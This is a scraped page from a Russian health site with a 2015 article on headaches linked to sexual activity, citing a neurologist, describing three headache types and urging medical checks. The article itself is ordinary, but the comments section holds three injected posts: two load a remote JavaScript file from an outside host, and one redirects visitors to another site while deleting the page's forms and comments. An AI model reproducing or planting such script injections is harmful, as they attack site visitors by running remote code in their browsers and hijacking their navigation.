Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Не ругайтесь на супруга! ...  >>  Не ругайтесь на супруга! Голова может болеть из-за секса!
 
Обратная связь
 

Не ругайтесь на супруга! Голова может болеть из-за секса!

Размер шрифта
16 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

«У меня болит голова», – эта фраза используется для отказа от секса настолько часто, что уже мало кто ей верит. Однако ученые с этим не согласятся, оказывается, значительная часть населения страдает от тяжелых головных болей, связанных именно с сексуальной активностью.

Около 1% населения жалуются на головные боли, связанные с сексом. Однако реальная частота этого симптома куда выше, считает доктор Хосе Биллер, невролог и специалист по лечению боли из Медицинского центра Университета Лойолы. «Многие люди, испытывающие головную боль во время секса, стесняются рассказать об этом врачу», – объясняет он.

Наверное каждый слышал шутку про жену, которая отказывает мужу, ссылаясь на головную боль. Но врачи уверяют, что такая ситуация совсем не повод для смеха. «Головные боли, связанные с сексуальной активностью, могут быть очень тяжелыми», – рассказывает Биллер. «Также они нарушают нормальную сексуальную жизнь человека и могут стать причиной разочарования его партнера».

Большая часть головных болей, связанных с сексом, имеют доброкачественную природу. Однако в небольшом проценте случаев они могут возникать при очень тяжелых состояниях: внутричерепных кровотечениях и гематомах, инсульте, а также расслоении артерий головного мозга. «Поэтому мы рекомендуем таким пациентам пройти полное неврологическое обследование. Необходимо убедиться в том, что у них нет угрожающих жизни заболеваний», – заявляет Биллер. «Это особенно важно сделать после первого появления неприятных симптомов». В 2004 году головная боль во время секса была официально признана одной из разновидностей первичной головной боли. Причем среди мужчин подобное состояние встречается в 3-4 раза чаще, чем у женщин.

Выделяют три основных типа головных болей, связанных с сексуальной активностью: 

  • Тупая боль в области головы и шеи, которая начинается до наступления оргазма и ухудшается с нарастанием сексуального возбуждения.
  • Сильная головная боль, которая начинается во время оргазма и длится несколько часов. Ее еще называют громоподобной головной болью, так как по резкости и интенсивности она напоминает раскат грома.
  • Головная боль, которая начинается после секса. Она усиливается в вертикальном положении и уменьшается, когда пациент лежит. Такая боль вызвана утечкой спинномозговой жидкости, если ее недостаточно, мозг слегка опускается вниз (когда пациент стоит вертикально), что и вызывает неприятные ощущения.

В зависимости от разновидности боли можно выбрать наиболее эффективный способ ее лечения и предотвращения.

Так что не стоит недооценивать эту проблему, несмотря на ее частое упоминание в шутках и анекдотах. При появлении таких болей необходимо обратиться к врачу, а для их профилактики достаточно вести активный образ жизни, иметь нормальный вес и не злоупотреблять алкоголем.

Другие статьи о женском здоровье читайте на страницах нашего одноименного спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:17

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Стыдные вопросы про секс   Лучший секс в жизни за 2 недели! Первая неделя   Как секс избавит вас от врачей   Не хотите потерять мужа, придется разрешить ходить налево!  
26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса! 02 апреля 2013Революция в лечении головной боли
 
12 декабря 2012Гормон оргазма не дает мужчинам изменять 18 сентября 2012Нет презерватива? Будет рак простаты!
 

Слайдшоу

1
Как остаться сексуальной с болезнью легких
Секреты сексуально удовлетворенных женщин
Почему болит во время секса?

Тесты

Здорова ли ваша предстательная железа
Знаете ли вы свой мозг?
Средства личной гигиены
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.